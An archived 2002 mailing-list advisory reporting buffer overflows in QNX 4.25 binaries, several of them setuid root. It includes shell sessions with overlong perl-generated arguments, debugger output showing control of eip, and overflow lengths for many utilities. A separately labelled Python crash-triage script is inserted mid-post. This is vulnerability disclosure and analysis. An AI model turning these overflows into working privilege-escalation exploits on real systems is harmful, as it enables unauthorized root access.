madcr: QNX 4.25 - multiple bof in suid/no suid files

From: Egor Egorov (madratsat_private)
Date: Wed Jun 12 2002 - 05:10:46 PDT


    /bin/sample
    ----------------//------------------------------
    # cd /bin
    # ls -l sample
    -rwsrwxr-x  1 root      root          20639 Jan 19  1996 sample
    # sample `perl -e 'print "A" x 280'`
    Profile based upon 2000 samples/second.
    
    //1/bin/sample terminated (SIGSEGV) at 0005:00000041
    %1  672  Memory fault      sample $(perl -e 'print "A" x 280')
    
    # wd sample `perl -e 'print "A" x 280'`
    ebp: 41414141
    eip: 00000041
    
    # wd sample `perl -e 'print "A" x 280, "B"'`
    ebp: 41414141
    eip: 00004241
    ----------------//------------------------------
    
    
    /bin/ex
    ----------------//------------------------------
    # wd ex `perl -e 'print "AAA" x 420, "good", "CCC" x 280'`
    ebp: 00000041
    eip: 646f6f67 - doog
    ----------------//------------------------------
    
     file       bytes for bof
    
    /bin/du       - 558
    /bin/find     - 799
    /bin/lex      - 1673
    /bin/mkdir    - 517
    /bin/rm       - 351
    /bin/serserv  - 224
    /bin/tcpserv  - 146
    /bin/termdef  - 729
    /bin/time     - 2489
    /bin/unzip    - 299
    /bin/use      - 1964
    /bin/wcc      - 138
    /bin/wcc386   - 137
    /bin/wd       -
    /bin/wdisasm  - 135
    /bin/which    - 304
    /bin/wlib     - 256
    /bin/wlink    - 10244
    /bin/wpp      - 256
    /bin/wpp386   - 256
    /bin/wprof    - 141
    /bin/write    - 157
    /bin/wstrip   - 817
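The wd dumps above are read by remembering that x86 stores eip little-endian: 0x646f6f67 is the byte sequence 67 6f 6f 64, i.e. the "good" marker from the argument, so the saved return address lies 1260 bytes (3 x 420) into it, while 0x00000041 after 280 "A"s shows only one input byte reaching eip. The following is an added crash-triage example, not part of madcr's post, that automates that reading for the three quoted dumps (rebuilt here as constructed strings): for each faulting register it reports whether the value consists of input bytes, at which offset, and whether the match is unambiguous.

```python
import re
import struct

# Constructed from the three wd dumps quoted in the post: (register dump, argument)
OBSERVATIONS = [
    ("ebp: 41414141\neip: 00000041", "A" * 280),
    ("ebp: 41414141\neip: 00004241", "A" * 280 + "B"),
    ("ebp: 00000041\neip: 646f6f67", "AAA" * 420 + "good" + "CCC" * 280),
]

# One 'name: hexvalue' register line, as wd prints them
REG_RE = re.compile(r"^(e[a-z]{2}):\s*([0-9a-fA-F]{1,8})$", re.M)


def parse_registers(dump):
    """Map register names to integer values from a wd-style dump."""
    return {m.group(1): int(m.group(2), 16) for m in REG_RE.finditer(dump)}


def input_offset(reg_value, payload):
    """Decide whether a 32-bit register value was taken from the input.

    x86 is little-endian, so 0x646f6f67 lives in memory as 67 6f 6f 64
    ('good').  Trailing 00 bytes are dropped: they come from the argv
    string's NUL terminator and whatever lay beyond it, not from input
    bytes (0x00000041 after 280 'A's).  Returns None when no input byte
    is involved, else where the bytes occur and whether that is unique.
    """
    raw = struct.pack("<I", reg_value).rstrip(b"\x00")
    data = payload.encode("latin-1")
    if not raw or raw not in data:
        return None
    return {"offset": data.find(raw), "matched": len(raw),
            "unique": data.count(raw) == 1}


def triage(dump, payload):
    """Per-register verdict for one crash: input-controlled or not."""
    return {name: input_offset(value, payload)
            for name, value in parse_registers(dump).items()}


if __name__ == "__main__":
    for dump, payload in OBSERVATIONS:
        print(triage(dump, payload))
```

A repeated filler byte ("AAAA") matches everywhere, which is why the post's third run uses a distinct marker; the "unique" flag records that difference.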
    
    This archive was generated by hypermail 2b30 : Wed Jun 12 2002 - 10:00:54 PDT